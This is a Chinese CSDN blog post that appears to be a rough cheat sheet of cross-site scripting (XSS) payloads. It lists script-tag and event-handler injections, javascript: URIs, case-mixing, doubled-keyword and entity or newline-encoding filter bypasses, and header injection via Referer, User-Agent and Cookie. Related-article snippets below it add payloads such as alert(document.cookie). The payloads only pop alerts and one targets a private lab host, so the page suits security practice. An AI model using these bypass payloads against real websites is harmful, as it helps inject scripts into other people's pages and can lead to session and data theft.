XSS语句大全

于 2024-04-24 23:55:02 发布
阅读量1.2k 收藏 11
点赞数 11
文章标签: xss 前端 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ch_ycc/article/details/138172035
版权

很乱

1.<script>alert(1)</script>

2、"><script>alert(1)</script>

3、' οnchange='alert(1)' //                                          html 事件 onchange-当元素改变时运行脚本

4、"οnchange='alert(1)' //                                          html 事件

5、"><a href=" javascript:alert(1)"                              html  a标签

6、“><a HREF=”javascript:alert(1)”                              html a标签的大小写转换

7、“><scrscriptipt>alert(1)</scrscriptipt>                   双写绕过

8、Javascr&#13ipt:alert(1)                                             &#13  13是回车

9、Javascr&#13ipt:alert(‘http://’)

10、t_sort="type="button" οnfοcus="alert(1)               onfocus-当窗口获得焦点时运行脚本

11、Referer传" type="button" οnclick="alert(1)

12、User agent传 "type="button" οnclick="alert(1)

13、Cookies传 user=" οnclick="alert(1)" type="text"

14、<img src=x οnlοad=alert(1)>

<script>alert('XSS')</script>

"><script>alert("XSS")</script>

' οnfοcus=javascript:alert('xss') >
' οnfοcus=javascript:alert('xss')//
' οnclick=javascript:alert('xss')//
" οnclick=javascript:alert('xss')//

"> <a href=javascript:alert('xss')>xss</a>//

"> <ScripT>alert('1')</ScRipT>

"> <a hrehreff=javascrscriptipt:alert('xss')>xss</a>//

"><sscriptcript>alert('xss')</sscriptcript>

javascript:alert(‘xss’) 转化为实体字符:&#32;&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;

burp放包 Referer: " οnclick=javascript:alert(1) type="text"

hackbar:user-agent  referer cookie  " οnclick=javascript:alert(1) type="text"

' http://192.168.100.152:88/level1.php?name="><a href="javascript:alert(/xss/)">xss '

<a%0dhref='javas%0acript:alert(1)'>xss

<img%0asrc=1%0dοnerrοr=alert(1)>

xYs5
关注
  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
32个触发事件XSS语句的总结
04-01
32个触发事件XSS语句的总结,新人学习xss必看!
xss测试语句大全--5000条
03-24
xss测试语句---5000条
XSS漏洞-03】XSS漏洞语句构造和绕过方法实例
m0_64378913的博客
05-14 4148
目录1 XSS语句构造方式1.1 第一种:利用[<>]构造HTML/JS语句1.2 第二种:利用javascript:伪协议1.3 第三种:事件驱动1.4 第四种:利用CSS(层叠样式脚本)1.5 其他标签及手法2 XSS语句变形及绕过2.1 第一种:大小写混编2.2 第二种:**双写绕过**。2.3 第三种:**引号的使用**2.4 第四种:使用 [/] 代替空格2.5 第五种:在一些关键字内插入回车符与Tab符2.6 第六种:编码绕过2.7 第七种:拆分跨站2.8
XSS语句总结
热门推荐
王骕的专栏
03-07 1万+
基础检测,出现弹框:           (显示1)           alert("xss") (显示xss)           alert(document.cookie) (显示cookie)) Cookie类型XSS     1.Xss 安全测试字符转换工具            工具猫             http://tool.dn8.net/# XSS测试平台
xss 常用语句
最新发布
柳岸花又明的博客
03-28 501
iframe srcdoc=""> --弹ip。 //引用外部的xss。 //弹cookie。 --反射型。
xss漏洞
weixin_59762059的博客
07-04 726
登录:http://192.168.200.129/06/vul/xss//xssblind/admin_login.php。输入的参数没有被过滤。alert(‘xss’)// 单引号闭合前面 //注释后面字。登录//192.168.200.129/01/vulnerabilities/xss_s/网站,抓包;存储型 xss 代码分析中,看到留言的 inster into 语句中,直接插入留言信息,将如下代码植入怀疑出现xss的地方(注意’的转义),即可在 项目内容 观看XSS效果。
XSS大全
weixin_46601374的博客
03-01 8214
XSS的原理和特性 xss:将用户的输入当作前端代码执行 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 html:定义了网页的结构 css:美化页面 js:可以操浏览器 XSS主要拼接的是什么 SQL注入拼接的是操作数据库的SQL语句XSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTML) xss
XSS漏洞(二)
不秃头的程序Yang
05-15 2433
一、xss测试语句 在网站是否存在xss漏洞时,应该输入一些标签如<、>输入后查看网页源代码是否过滤标签,如果没过滤,很大可能存在xss漏洞。 常用的测试语句: <h5>1</h5> <span>1</span> <script>console.log(1);</script> 闭合: "><span>x</span> '><span>x</span> 单行注释:
Web安全原理剖析(十七)——XSS常用语句及编码绕过
Phantom03167的博客
11-01 8978
XSS常用语句及编码绕过
xss 语句大全
kaosini的专栏
06-12 1551
转载地址:http://blog.sina.com.cn/s/blog_3f595e9e010007pf.html alert(document.cookie) ='>cript>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E
XSS触发语句小结
7Riven's blog
01-01 2061
一、标准语句 <script>alert(/XSS/)</script> 二、尝试大小写 <sCript>alert(1)</scRipt> 三、使用<img>标签 1、windows事件 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("...
xss语句构造.docx
01-02
本文将详细介绍XSS语句的构造方法,包括常见的大小写绕过、双写绕过、空格代替、事件的使用等。 一、利用构造HTML/JS 可以利用构造HTML标签和标签。在测试页面提交参数[利用构造HTML/JS</h1>],提交[<script>alert...
XSS测试语句大全
08-07
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html...
xss攻击语句大全。。
04-16
网站安全测试。。xss漏洞。。免去你输入的麻烦。可以直接复制粘贴。。
渗透测试xss测试语句
07-14
console.log输出语句,不能绕WAF
【精选】【XSS漏洞03】XSS漏洞验证、语句构造与绕过方法
qq_53058639的博客
11-09 450
了解漏洞验证相关概念含义;掌握XSS漏洞验证的方法;掌握XSS语句构造的5种方法;掌握XSS语句绕过的8种方法。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 5560
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
XSS语句
2301_76786857的博客
01-20 1120
跨站脚本攻击(XSS)是一种常见的网络攻击手段,攻击者通过在目标网站中注入恶意脚本,获取用户敏感信息,如用户名、密码等,从而达到盗取用户数据的目的。
url地址栏构造xss攻击的语句有哪些
05-25
以下是一些可能用于在URL地址栏中构造XSS攻击的语句: 1. `<script>alert('XSS attack');</script>` 2. `<img src="javascript:alert('XSS attack');">` 3. `javascript:alert('XSS attack')` 4. `<iframe src="javascript:alert('XSS attack');"></iframe>` 5. `<a href="javascript:alert('XSS attack');">Click me</a>` 6. `<svg onload="alert('XSS attack')">` 7. `<body onload="alert('XSS attack')">` 8. `<input type="text" value="XSS attack" onfocus="alert('XSS attack')">` 这些语句利用了浏览器执行JavaScript代码的特性,从而在用户访问包含这些语句的URL时触发XSS攻击。一旦攻击成功,攻击者可以利用被攻击者的身份进行恶意行为,例如窃取用户数据、篡改页面内容等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值